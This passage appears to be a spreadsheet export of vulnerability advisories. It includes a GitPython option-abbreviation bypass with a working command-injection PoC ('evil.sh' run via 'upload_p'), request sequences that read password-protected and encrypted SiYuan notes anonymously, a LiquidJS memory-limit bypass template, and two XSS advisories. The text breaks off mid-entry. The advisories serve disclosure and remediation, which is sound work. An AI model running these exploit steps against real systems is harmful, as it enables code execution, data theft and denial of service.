The fix canonicalizes an option name along **one** axis (underscore→hyphen via `dashify`) and checks it against an **exact-match** dict. It does not account for git's unambiguous long-option prefix abbreviation. Git accepts any unambiguous prefix of a long option (`--upload-p`, `--upload-pa`, `--upload-pac` all resolve to `--upload-pack`). So a kwarg key like `upload_p` canonicalizes to `upload-p`, misses the blocklist dict, and is emitted to git as `--upload-p=&lt;value&gt;` → executed as `--upload-pack=&lt;value&gt;` → command injection, in the default `allow_unsafe_options=False` configuration.

### The asymmetry (root cause)

```python
# git/cmd.py (commit 20c5e275), lines 948-974
@classmethod
def _canonicalize_option_name(cls, option):
    option_name = option.lstrip("-").split("=", 1)[0]
    option_tokens = option_name.split(None, 1)
    if not option_tokens:
        return ""
    return dashify(option_tokens[0])      # only transform: "_" -&gt; "-"

@classmethod
def check_unsafe_options(cls, options, unsafe_options):
    canonical_unsafe_options = {cls._canonicalize_option_name(o): o for o in unsafe_options}
    for option in options:
        unsafe_option = canonical_unsafe_options.get(cls._canonicalize_option_name(option))
        if unsafe_option is not None:
            raise UnsafeOptionError(...)
```

The guard normalizes only `_`→`-` and does exact dict membership. Git's CLI parser accepts a broader grammar (prefix abbreviation) than the guard models, so abbreviated keys slip through and reach git as the blocked option.

### Affected code (commit `20c5e275`)

| Location | Role |
|---|---|
| `git/cmd.py:948-960` `_canonicalize_option_name` | canonicalizer — no prefix expansion |
| `git/cmd.py:963-974` `check_unsafe_options` | exact-match dict lookup (the incomplete guard) |
| `git/cmd.py:1511` `transform_kwarg` | emits `--&lt;dashify(name)&gt;=&lt;value&gt;` to the CLI |
| `git/repo/base.py:1411,1413` | clone call sites |
| `git/remote.py:1074,1128,1201` | fetch / pull / push call sites |

### Bypass keys (verified)

| kwarg key | git resolves to | path | weaponizable |
|---|---|---|---|
| `upload_p`, `upload_pac` | `--upload-pack` | clone / fetch / pull | Yes — direct RCE |
| `receive_p` | `--receive-pack` | push | Yes — direct RCE |
| `exe` | `--exec` | push | Yes — direct RCE |
| `conf`, `confi` | `--config` | clone | bypasses option blocklist; RCE needs an additional config vector (see note) |

### Minimal PoC

Self-contained, no network egress (a local bare repo acts as the "remote"). Tested on current `main` (git 2.50.1):

```python
import os, stat, tempfile
from git import Repo

work = tempfile.mkdtemp()
marker = os.path.join(work, "RCE_MARKER")

# fake "upload-pack" program that proves arbitrary command execution
prog = os.path.join(work, "evil.sh")
with open(prog, "w") as f:
    f.write(f"#!/bin/sh\ntouch {marker}\nexit 1\n")  # exit 1 so git aborts after our code ran
os.chmod(prog, os.stat(prog).st_mode | stat.S_IEXEC)

bare = os.path.join(work, "remote.git")
Repo.init(bare, bare=True)

# attacker-controlled kwarg KEY 'upload_p' -&gt; --upload-p=&lt;prog&gt; -&gt; git runs &lt;prog&gt;
try:
    Repo.clone_from(bare, os.path.join(work, "out"), upload_p=prog)
except Exception:
    pass  # git aborts with GitCommandError AFTER the payload executed

print("RCE marker created:", os.path.exists(marker))  # True -&gt; command injection confirmed
```

Equivalent at the shell: `git clone --upload-p=/tmp/evil.sh src out` runs `evil.sh`.

Confirmed behavior:
- `upload_pack` (exact) → blocked; `upload_p` (abbrev) → passes guard, reaches git, executes. The fix works for the form it models but not the abbreviated form.
- `allow_unsafe_options=True` opt-out behaves as documented (out of scope).

### Honest scope note

Like the parent CVE, exploitation requires a host application that flows attacker-controlled kwarg **keys** into a GitPython clone/fetch/pull/push. Where the host passes only fixed/validated keys, this is not reachable — the vulnerability is in the library's documented defense-in-depth control (`allow_unsafe_options=False`), which this variant defeats.

On the `--config` family: `conf` bypasses the option blocklist, but weaponizing `--config protocol.ext.allow=always` via an `ext::` URL is independently blocked by GitPython's protocol allowlist (`allow_unsafe_protocols=False`). The directly weaponizable family is `upload-pack` / `receive-pack` / `exec`. Reported transparently — not claiming Critical.

### Suggested remediation (any one)

1. **Prefix-aware matching:** reject any option whose canonical name is an unambiguous prefix of a blocked option (≈ `startswith` on the blocked canonical name, after `dashify`).
2. **Disable abbreviation at the sink:** pass `--end-of-options` or invoke git in a way that disables long-option abbreviation.
3. **Allowlist** option names on security-sensitive subcommands instead of a blocklist.

Remediation should also cover the `-c`/`--config` family abbreviations, even though the `ext::` route is currently gated by the protocol allowlist.</t></is></c><c r="S97" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67325</t></is></c></row><row r="98"><c r="A98" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B98" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C98" s="5" t="inlineStr"><is><t>CVE-2026-68584</t></is></c><c r="D98" s="5" t="inlineStr" /><c r="E98" s="5" t="inlineStr" /><c r="F98" s="5" t="inlineStr" /><c r="G98" s="5" t="inlineStr" /><c r="H98" s="5" t="n"><v>0.003</v></c><c r="I98" s="5" t="inlineStr" /><c r="J98" s="5" t="inlineStr" /><c r="K98" s="5" t="inlineStr" /><c r="L98" s="5" t="inlineStr"><is><t>go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M98" s="5" t="inlineStr"><is><t>0.0.0-20260721020826-2d069dce84a2</t></is></c><c r="N98" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O98" s="5" t="inlineStr" /><c r="P98" s="5" t="inlineStr" /><c r="Q98" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="R98" s="5" t="inlineStr"><is><t>**CVE:** This vulnerability corresponds to [CVE-2026-68584](https://nvd.nist.gov/vuln/detail/CVE-2026-68584).

### Summary

SiYuan's publish mode defines a "protected" access level: a document that is publicly listed but requires a password to read (per the product's own UI help text, protected = "Publicly visible, requires password to access"). The password is enforced on the primary content path (`getDoc`, via `FilterContentByPublishAccess`).

Several other content-returning endpoints `getHeadingChildrenDOM`, `getHeadingDeleteTransaction`/`getHeadingLevelTransaction`/ `getHeadingInsertTransaction`, and `getBacklinkDoc`/`getBackmentionDoc` return rendered block DOM with **no password check at all**. Combined with reader-reachable endpoints that leak a protected document's internal block IDs, an anonymous reader can retrieve the full body of a password-protected document without the password. This has been reproduced end-to-end on a live instance.

### Details

**The password control and where it is enforced.** Publish access has five levels encoded in `visible`/`password`/`disable`: public, protected (password), hidden, private (password), forbidden. `getDoc` correctly enforces the password for protected/private documents via `FilterContentByPublishAccess`. The bug is that other content endpoints do not.

**Content endpoints with no password check (all `CheckAuth`-only):**
- `getHeadingChildrenDOM` returns rendered DOM of a heading subtree.
- `getHeadingDeleteTransaction`/`getHeadingLevelTransaction`/`getHeadingInsertTransaction` return rendered heading DOM in the computed transaction payload (no mutation occurs on this path).
- `getBacklinkDoc`/`getBackmentionDoc` return rendered DOM of referencing blocks.

None of these invokes the publish-password check that `getDoc` applies. Each converts a block ID into full rendered content regardless of the containing document's protected/password status.

**The ID-leak that removes the precondition.** A protected document is, by design, publicly listed (`listDocsByPath` filters on `visible`, and protected documents are visible), so an anonymous reader obtains the document's root ID. The document's internal block/heading IDs are then obtainable from reader-reachable endpoints notably the `searchEmbedBlock` endpoint (reported separately), whose post-query filter `FilterEmbedBlocksByPublishAccess` **replaces the content string but retains the block ID**. So the "filtered" search still yields the protected document's internal heading IDs. (Other reader-reachable endpoints also leak block IDs, the vulnerability does not depend on any single ID source.)

**The chain, reproduced on a live instance.** Against a real protected document (password set), an anonymous reader on port 6808 with no token and no password:

1. `getDoc(protectedDoc)` → returns the password-required placeholder (correctly blocked).
2. `searchEmbedBlock` with a statement selecting heading blocks for the document's root ID → returns the heading IDs (content filtered, IDs retained).
3. `getHeadingChildrenDOM(headingId)` → returns the full rendered body of the protected document, including its protected content.

The password gate that step 1 enforces is entirely bypassed by step 3.

### Proof of Concept

Reproduced on a local instance (SiYuan running locally, publish mode enabled on port 6808, publish Basic Auth disabled). Setup: a document marked "protected" with password, whose body contains the unique marker `TOP_SECRET_CRITICAL_123`.

**1. Confirm the password gate blocks the primary path (anonymous, port 6808):**
```
POST http://127.0.0.1:6808/api/filetree/getDoc
{"id":"PROTECTED_DOC"}
```
Returns the password-required placeholder correctly blocked.

**2. Leak the protected document's heading ID (anonymous, port 6808):**
```
POST http://127.0.0.1:6808/api/search/searchEmbedBlock
{"stmt":"SELECT * FROM blocks WHERE root_id='PROTECTED_DOC' AND type='h'"}
```
Returns heading blocks with their IDs; the content field is filtered but the block ID is retained.

**3. Retrieve the protected content without the password (anonymous, port 6808):**
```
POST http://127.0.0.1:6808/api/block/getHeadingChildrenDOM
{"id":"HEADING_ID"}
```
Returns HTTP 200 with the rendered body of the protected document, including `TOP_SECRET_CRITICAL_123` retrieved with no token and no password.

`getHeadingDeleteTransaction`/`getHeadingLevelTransaction`/`getHeadingInsertTransaction` and `getBacklinkDoc`/ `getBackmentionDoc` provide the same password-free content retrieval given a block ID from the protected document.

### Impact

An anonymous reader (publish mode with auth disabled) or any publish `RoleReader` can read the full content of a password-protected published document without the password, defeating the "protected" access control the product documents as a password gate. The core defect is that these content-returning endpoints perform no publish-password check; the ID-leak endpoints (multiple sources) supply the block IDs that make the bypass reachable anonymously and untargeted. Impact is confidentiality-only (content disclosure); no modification occurs on these paths. Encrypted notebooks are out of scope.

### Suggested fix

Apply the publish-password/publish-access check that `getDoc` uses (`FilterContentByPublishAccess`/`IsReadOnlyRoleContext` plus the password-cookie check) to every content-returning endpoint: `getHeadingChildrenDOM`, the three `getHeading*Transaction` handlers, and `getBacklinkDoc`/`getBackmentionDoc`. Separately, `FilterEmbedBlocksByPublishAccess` should omit filtered blocks entirely rather than blanking the content while retaining the ID, so that filtered results cannot be used to enumerate a protected document's internal block IDs. The durable fix is to enforce the publish boundary in the shared render/DOM path rather than per-handler, since any content endpoint that omits the check reintroduces this class.</t></is></c><c r="S98" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68584</t></is></c></row><row r="99"><c r="A99" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B99" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C99" s="5" t="inlineStr"><is><t>CVE-2026-69222</t></is></c><c r="D99" s="5" t="inlineStr" /><c r="E99" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F99" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G99" s="5" t="inlineStr" /><c r="H99" s="5" t="n"><v>0.004</v></c><c r="I99" s="5" t="inlineStr" /><c r="J99" s="5" t="inlineStr" /><c r="K99" s="5" t="inlineStr" /><c r="L99" s="5" t="inlineStr"><is><t>npm:liquidjs</t></is></c><c r="M99" s="5" t="inlineStr"><is><t>10.27.2</t></is></c><c r="N99" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O99" s="5" t="inlineStr" /><c r="P99" s="5" t="inlineStr" /><c r="Q99" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R99" s="5" t="inlineStr"><is><t>### Summary

The `join` filter (`src/filters/array.ts:8-13`) charges `memoryLimit` by array element **count**, not by the string length it produces, letting a template bypass a configured `memoryLimit` and allocate strings far past budget — bounded only by V8/process limits, not by `memoryLimit`.

### Details

```js
// src/filters/array.ts:8-13
export const join = argumentsToValue(function (this: FilterImpl, v: any[], arg: string) {
  const array = toArray(v)
  const sep = isNil(arg) ? ' ' : stringify(arg)
  const complexity = array.length * (1 + sep.length)   // element COUNT, not element sizes
  this.context.memoryLimit.use(complexity)
  return array.join(sep)                                // allocates sum(element lengths) + separators
})
```

`concat` (`array.ts:72`) is the enabler: it charges by element count too, but only copies references (cheap for both limiter and heap), so an array's element count can be doubled repeatedly at near-zero real cost. `join` is where the bug lives — it's the call that actually materializes all referenced content into one string, and its own charge (`array.length`) doesn't reflect that.

Same undercounting class as already-fixed `replace` (GHSA-mmg9-6m6j-jqqx), `replace_first` (GHSA-6q5m-63h6-5x4v), `date`/strftime (GHSA-hh27-hf48-9f5q) — `join` wasn't covered. Sibling `array_to_sentence_string` (`src/filters/string.ts:210`) has the identical defect.

### PoC

Live-reproduced against `liquidjs@10.27.1`, Node v24.3.0.

```javascript
const { Liquid } = require('liquidjs');
const engine = new Liquid({ memoryLimit: 1e7 }); // 10M-unit DoS defense

const E = 5000, DOUBLINGS = 13;
const chunk = 'a'.repeat(E);
let tpl = `{%- assign s = "${chunk}" -%}{%- assign a = s | split: "NOSUCHSEP" -%}`;
for (let i = 0; i &lt; DOUBLINGS; i++) tpl += `{%- assign a = a | concat: a -%}`; // 1 -&gt; 8192 elements
tpl += `{%- assign out = a | join: "" -%}{{ out | size }}`;

const len = Number(engine.renderSync(engine.parse(tpl))); // succeeds — should be blocked
console.log('output length:', len);  // output length: 40960000
```

Verified by binary-search on `memoryLimit`: render is **blocked at 29573**, **succeeds at 29574** — confirming total charge across `split`+13×`concat`+`join` is exactly 29,574 units (split 5000, concat 16382, join 8192). Output length: **40,960,000** — **1385x** the total charged, &gt;4x the configured 10,000,000-unit limit. Scaling `DOUBLINGS` grows output exponentially for linear charge growth, driving toward gigabytes and a `RangeError: Invalid string length` / V8 OOM crash.

### Impact

Any app rendering attacker-influenced templates with `memoryLimit` set (LiquidJS docs list it as covering "array concat/join/strftime") can have that control bypassed by one short template, forcing allocation well past budget up to a process crash. `split`/`concat` are correctly charged; the gap is `join`'s own accounting of its own output. (LiquidJS's security-model docs call these limits "cooperative safeguards, not strict isolation" — doesn't change that `join`'s charge is wrong relative to what it allocates.)</t></is></c><c r="S99" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69222</t></is></c></row><row r="100"><c r="A100" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B100" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C100" s="5" t="inlineStr"><is><t>CVE-2026-72789</t></is></c><c r="D100" s="5" t="inlineStr" /><c r="E100" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F100" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G100" s="5" t="inlineStr" /><c r="H100" s="5" t="n"><v>0.003</v></c><c r="I100" s="5" t="inlineStr" /><c r="J100" s="5" t="inlineStr" /><c r="K100" s="5" t="inlineStr" /><c r="L100" s="5" t="inlineStr"><is><t>go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M100" s="5" t="inlineStr"><is><t>0.0.0-20260726020813-a25c2dd06aae</t></is></c><c r="N100" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O100" s="5" t="inlineStr" /><c r="P100" s="5" t="inlineStr" /><c r="Q100" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R100" s="5" t="inlineStr"><is><t>**CVE:** This vulnerability corresponds to [CVE-2026-72789](https://nvd.nist.gov/vuln/detail/CVE-2026-72789).

### Summary

`publishAccess.json` is an opt-out list. The publish gate returns *accessible* for anything not explicitly listed in it. Encrypted notebooks are never written into that file, because only the administrator-gated `setPublishAccess` writes it and no part of the encryption subsystem does. Consequently every encrypted notebook is publish-accessible as far as the gate is concerned.

While an encrypted notebook is unlocked, an anonymous reader in publish mode can list it, enumerate its documents, and retrieve their fully decrypted content. No key material, no password, and no cracking is involved. The kernel decrypts the data and serves it because the authorization layer never asks whether the notebook is encrypted.

This is reported as a defect in the gate rather than in any individual handler. Endpoints that were previously reviewed and found to apply the correct checks do apply them. The checks return true.

### Details

**The gate defaults to accessible.** `CheckPathAccessableByPublishIgnore(box, path, ignore)` iterates the ignore list and returns false only on a match:

```go
for _, item := range publishIgnore {
    if item.ID == box || strings.Contains(path, item.ID) {
        return false
    }
}
return true   // unlisted means accessible
```

**Encrypted notebooks are never listed.** `publishAccess.json` is written only by `setPublishAccess` (`kernel/api/router.go:169`), which carries `CheckAdminRole` and `CheckReadonly`. Nothing in `crypto.go`, `encrypted_ops.go` or `notebook_crypto.go` writes to it. An administrator would have to manually add each encrypted notebook to the ignore list to protect it, and nothing in the product prompts or documents that.

**Neither core gate rejects them.** On both `eef105683` and `v3.7.4-alpha.1`:

```go
func checkBlockTreeAccessableByPublishAccess(...) bool {
    return CheckPathAccessableByPublishIgnore(bt.BoxID, bt.Path, publishIgnore) &amp;&amp;
           (password == "" || CheckPublishAuthCookie(c, passwordID, password))
}
```

For an encrypted notebook the first term is true because it is unlisted, and the second is true because encrypted notebooks carry no publish password. The conjunction returns true.

`IsEncryptedBox` does not appear in `kernel/model/publish_access.go` at all on master. On the development branch it appears once, inside `parseAttributeViewForPublishAccess`, where it routes *into* encrypted boxes rather than excluding them. The publish authorization layer has no concept of an encrypted notebook.

**The chain.** Verified on the development branch, which is the harder target because the block-metadata, attribute-view, path-resolution and encrypted-notebook-status fixes have all landed there.

1. `lsNotebooks` calls `ListNotebooks()`, which includes encrypted notebooks and reports `Encrypted: boxConf.Encrypted` without filtering on it. The reader filter skips only notebooks that are `Closed` or publish-invisible. An unlocked encrypted notebook is neither, so it is returned to an anonymous reader together with its identifier.
2. `listDocsByPath{notebook: &lt;encrypted box id&gt;, path: "/"}` applies only `CheckPathAccessableByPublishIgnore`, which passes, returning the document identifiers and titles inside the encrypted notebook.
3. `getDoc` routes to `GetDocInBox(...)`, after which `FilterContentByPublishAccess(...)` returns the content unmodified because the box is unlisted. The response is the fully decrypted document. `getBlockKramdown` reaches `GetBlockKramdownInBox` for the same result in Markdown.

Handlers reach the decrypted store through `encryptedNotebookFromArg(arg)` on a client-supplied notebook argument. This function predates the current release and is not a recent addition.

**The precondition is the unlock window.** `GetBlockTreeInBox` returns nil while a notebook is locked, treating it as nonexistent, and non-nil once unlocked. So the exposure is bounded to the period during which the legitimate user has the notebook open, which is precisely the period in which they are working in it. No action by the attacker triggers or extends that window, but no unusual condition is required either.

**On endpoints previously assessed as correctly gated.** `getBlockDOM` and `getBlockKramdown` apply password and visibility checks. `exportPreview` applies `FilterContentByPublishAccess`. Those assessments are accurate and this report does not contradict them. The checks execute and return true, because the visibility term resolves to accessible for an unlisted box and the password term is vacuous for a notebook that has no publish password. Patching any individual handler would not change that result.

### Proof of Concept

Precondition: publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. An encrypted notebook that is currently unlocked by the legitimate user.

Step 1, obtain the encrypted notebook's identifier:

```
POST http://127.0.0.1:6808/api/notebook/lsNotebooks
{}

→ 200. The list includes the encrypted notebook, with encrypted: true and its id.
```

Step 2, enumerate its documents:

```
POST http://127.0.0.1:6808/api/filetree/listDocsByPath
{"notebook":"&lt;encrypted box id&gt;","path":"/"}

→ 200, document identifiers and titles from inside the encrypted notebook
```

Step 3, retrieve decrypted content:

```
POST http://127.0.0.1:6808/api/filetree/getDoc
{"id":"&lt;document id from step 2&gt;"}

→ 200, the fully decrypted document
```

`getBlockKramdown` returns the same content as decrypted Markdown. Repeating step 3 while the notebook is locked returns not-found, which confirms the unlock window is the only thing standing between an anonymous reader and the plaintext.

### Impact

The confidentiality guarantee of the encrypted-notebook feature is defeated against a remote, unauthenticated attacker for as long as the notebook is unlocked. A user who encrypts a notebook is expressing that its contents should be protected beyond the ordinary publish boundary. The publish gate does not recognise that intent, and instead treats the notebook as publicly readable because nobody added it to an opt-out list that the encryption feature does not write to.

The exposure is full document content rather than metadata, and it applies to every document in the notebook. It requires no key material, no password, no offline work and no interaction with the encryption subsystem at all.

### Suggested fix

Fail closed on encryption, independently of `publishAccess.json`:

```go
if IsEncryptedBox(bt.BoxID) {
    return false
}
```

in both `checkBlockTreeAccessableByPublishAccess` and `CheckBlockTreeMetadataAccessableByPublishAccess`, and exclude encrypted notebooks from `lsNotebooks` and `listDocsByPath` for read-only roles.

The broader point is the default. An opt-out authorization list means every future notebook type, storage backend or content class is publicly accessible until somebody remembers to add it. Encrypted notebooks are the case where that default is most clearly wrong, but they are unlikely to be the only one.</t></is></c><c r="S100" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72789</t></is></c></row><row r="101"><c r="A101" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B101" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C101" s="5" t="inlineStr"><is><t>CVE-2026-72790</t></is></c><c r="D101" s="5" t="inlineStr" /><c r="E101" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F101" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G101" s="5" t="inlineStr" /><c r="H101" s="5" t="n"><v>0.002</v></c><c r="I101" s="5" t="inlineStr" /><c r="J101" s="5" t="inlineStr" /><c r="K101" s="5" t="inlineStr" /><c r="L101" s="5" t="inlineStr"><is><t>go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M101" s="5" t="inlineStr"><is><t>0.0.0-20260726005141-9edb321eb451</t></is></c><c r="N101" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O101" s="5" t="inlineStr" /><c r="P101" s="5" t="inlineStr" /><c r="Q101" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R101" s="5" t="inlineStr"><is><t>**CVE:** This vulnerability corresponds to [CVE-2026-72790](https://nvd.nist.gov/vuln/detail/CVE-2026-72790).

### Relationship to GHSA-8x84-r2ff-h8pq (please read first)

`getNotebookInfo` is named in the earlier advisory GHSA-8x84-r2ff-h8pq, in its remediation section, which asked for reader filtering on both `getNotebookConf` and `getNotebookInfo`. Commit `3bc014c7d` applied that filtering to `getNotebookConf` only.

That advisory grouped `getNotebookInfo` under `BoxCrypt`, and `getNotebookInfo` never returns `BoxCrypt`. Anyone checking the handler for key material would correctly find none and move on. This report corrects that characterisation and states what the handler actually discloses, which is notebook metadata rather than key material. If you would prefer this tracked as a follow-up on the original advisory rather than separately, that is entirely reasonable.

### Summary

`/api/notebook/getNotebookInfo` is registered with `CheckAuth` only and applies no authorization check of any kind. Given a notebook identifier, it returns that notebook's author-written name, document count, total size and creation and modification timestamps. It does so for every notebook the server has loaded, including notebooks that `lsNotebooks` deliberately withholds from readers because they are closed or not publish-visible.

### Details

| Item | Detail |
|---|---|
| Route | `kernel/api/router.go:123` `POST /api/notebook/getNotebookInfo` → `model.CheckAuth` → `getNotebookInfo` |
| Middleware | `CheckAuth` only, no `CheckReadonly`, no `CheckAdminRole` |
| Guard in handler | None. `IsReadOnlyRoleContext`, `publishAccess`, `Visible` and `Closed` all return zero matches |
| Exposed | `BoxInfo{ID, Name, DocCount, Size, HSize, Mtime, CTime, HMtime, HCtime}` |
| Affected refs | `eef105683` (v3.7.3, master HEAD) and `v3.7.4-alpha.1`, handler identical on both |

**The handler.** It validates `boxID` against the ID pattern, calls `box := model.Conf.Box(boxID)`, returns a not-found response if that is nil, and otherwise returns `box.GetInfo()` unmodified. `GetInfo()` (`kernel/model/box.go:470`) walks the notebook's files and returns the metadata listed above. There is no ownership check and no publish-access check anywhere on the path.

The nil branch is also a minor existence oracle: a valid-format identifier that names no loaded notebook is distinguishable from one that does.

**Guarded sibling.** `lsNotebooks`, the notebook lister, is also reader-reachable and does filter. For read-only roles it skips any notebook where `notebook.Closed` holds, and skips any notebook whose publish-access entry has `!item.Visible`. The codebase therefore intends closed and non-published notebooks to be invisible to readers. `getNotebookInfo` returns their name and statistics to any reader who supplies the identifier.

**Precedent.** GHSA-f2rw-w22v-54vh restricted `getEncryptedNotebookStatus`, which disclosed encrypted-notebook names and lock state, to administrators. `getNotebookInfo` is the non-encrypted analogue, disclosing regular notebook names and statistics including for notebooks outside the reader's publish scope, and was not restricted.

**Reachability, stated precisely, because it differs by branch.**

On v3.7.3 a reader can obtain the identifier of a notebook they cannot see, by chaining two endpoints that are currently ungated on that branch. `getBlockDefIDsByRefText` returns block and document identifiers workspace-wide, including from hidden notebooks. `getPathByID` then returns the owning notebook identifier for any such block, in its `notebook` field. `getFullHPathByID` additionally discloses the notebook name directly. The chain requires no special conditions beyond a reference text that occurs somewhere in the workspace.

On the development branch those sources are already closed. `getPathByID` now gates through `CheckBlockIdMetadataAccessableByPublishAccessInBox`, `getIDsByHPath` through `filterFileTreeBlockIDsByPublishDiscoverability`, and `getBlockDefIDsByRefText` and `getFullHPathByID` are likewise gated. Notebook identifiers are a fourteen-digit timestamp plus seven random characters, and `Conf.Box(boxID)` returns non-nil only for loaded notebooks, so guessing is not practical. A reader-reachable route on the development branch that yields the identifier of a hidden notebook was not found.

So on the development branch this is defence in depth rather than a live path. It is reported because the handler itself remains unguarded on both branches, and because closing it removes any dependence on those identifier sources staying gated in future.

### Proof of Concept

Precondition: publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. A notebook that is closed or not publish-visible. Steps 1 and 2 apply to v3.7.3; on the development branch, start at step 3 with a known identifier.

Step 1, obtain block identifiers workspace-wide:

```
POST http://127.0.0.1:6808/api/block/getBlockDefIDsByRefText
{"anchor":"&lt;a word likely to occur anywhere in the workspace&gt;"}

→ 200, block and document identifiers including ones inside hidden notebooks
```

Step 2, resolve one to its owning notebook:

```
POST http://127.0.0.1:6808/api/filetree/getPathByID
{"id":"&lt;identifier from step 1&gt;"}

→ 200, the notebook field carries the hidden notebook's boxID
```

Step 3, read the notebook's metadata:

```
POST http://127.0.0.1:6808/api/notebook/getNotebookInfo
{"notebook":"&lt;boxID from step 2&gt;"}

→ 200, returns name, docCount, size, hSize, mtime, ctime, hMtime, hCtime
   for a notebook that lsNotebooks does not return to this same session
```

The differential is the point: call `lsNotebooks` with the same session and confirm the notebook is absent from the list, then call `getNotebookInfo` and receive its name and statistics.

### Impact

An anonymous reader in publish mode, or any publish `RoleReader`, can read the author-written name, document count, total size and activity timestamps of notebooks that are closed or not published, which are exactly the notebooks the notebook lister withholds from them. Notebook names are free text chosen by the author and routinely describe their contents. Document count and size indicate scale, and the modification timestamp reveals recent activity in a workspace area the reader has no access to. Confidentiality only, with no integrity or availability impact, and no document content is disclosed.

### Suggested fix

Apply the same filtering `lsNotebooks` already performs. When `IsReadOnlyRoleContext(c)` holds, return the not-found response unless the notebook is publish-visible and not closed, before calling `GetInfo()`. This is the reader filtering the earlier advisory's remediation section requested for this handler.</t></is></c><c r="S101" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72790</t></is></c></row><row r="102"><c r="A102" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B102" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C102" s="5" t="inlineStr"><is><t>CVE-2026-72925</t></is></c><c r="D102" s="5" t="inlineStr" /><c r="E102" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F102" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G102" s="5" t="inlineStr" /><c r="H102" s="5" t="n"><v>0.002</v></c><c r="I102" s="5" t="inlineStr" /><c r="J102" s="5" t="inlineStr" /><c r="K102" s="5" t="inlineStr" /><c r="L102" s="5" t="inlineStr"><is><t>npm:@swc/html, rust:swc_html_minifier</t></is></c><c r="M102" s="5" t="inlineStr"><is><t>1.15.47-nightly-20260729.1, 59.0.0</t></is></c><c r="N102" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O102" s="5" t="inlineStr" /><c r="P102" s="5" t="inlineStr" /><c r="Q102" s="5" t="inlineStr"><is><t>CWE-79, CWE-116</t></is></c><c r="R102" s="5" t="inlineStr"><is><t>## Impact

`@swc/html` minifies JSON contained in `script` elements such as
`application/json` and `application/ld+json` by parsing and serializing the
JSON value.

Before the patched versions, JSON serialization could convert escaped
less-than signs such as `\u003C` into literal `&lt;` characters. If the JSON
contained an escaped `&lt;/script&gt;` sequence, the generated HTML could terminate
the containing script element early because HTML tokenization occurs before
the JSON is consumed.

Applications that minify HTML containing attacker-controlled JSON data could
therefore transform inert data into active markup. A crafted payload could
execute script in the origin of the generated page.

## Patches

The issue is fixed in:

- `@swc/html` 1.15.47
- `swc_html_minifier` 59.0.0

The minifier now re-escapes less-than signs after JSON serialization, preserving
the script element boundary.

## Workarounds

Users who cannot upgrade can disable JSON minification with:

```js
await minify(html, {
  minifyJson: false,
});</t></is></c><c r="S102" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72925</t></is></c></row><row r="103"><c r="A103" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B103" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C103" s="5" t="inlineStr"><is><t>CVE-2026-73262</t></is></c><c r="D103" s="5" t="inlineStr" /><c r="E103" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F103" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G103" s="5" t="inlineStr" /><c r="H103" s="5" t="n"><v>0.002</v></c><c r="I103" s="5" t="inlineStr" /><c r="J103" s="5" t="inlineStr" /><c r="K103" s="5" t="inlineStr" /><c r="L103" s="5" t="inlineStr"><is><t>pip:prowler, pip:prowler-cloud</t></is></c><c r="M103" s="5" t="inlineStr"><is><t>5.37.0</t></is></c><c r="N103" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O103" s="5" t="inlineStr" /><c r="P103" s="5" t="inlineStr" /><c r="Q103" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R103" s="5" t="inlineStr"><is><t>## Summary

Prowler's HTML output formatter inserts `finding.resource_tags` into the generated report without HTML escaping. A cloud principal who can create or edit a resource tag in an account that is later scanned can store HTML or JavaScript in that tag. When another user opens the generated Prowler HTML report, the payload executes in the report page.

## Impact

This is stored cross-site scripting in a security report artifact. The attacker needs permission to influence tags on a scanned cloud resource, and the victim must open the generated HTML report. In that context, JavaScript can read and modify the report DOM, alter displayed findings, and interact with any same-origin local or hosted report content available to the browser. This can undermine trust in generated security findings and can expose data contained in the report page.

## Gate checks

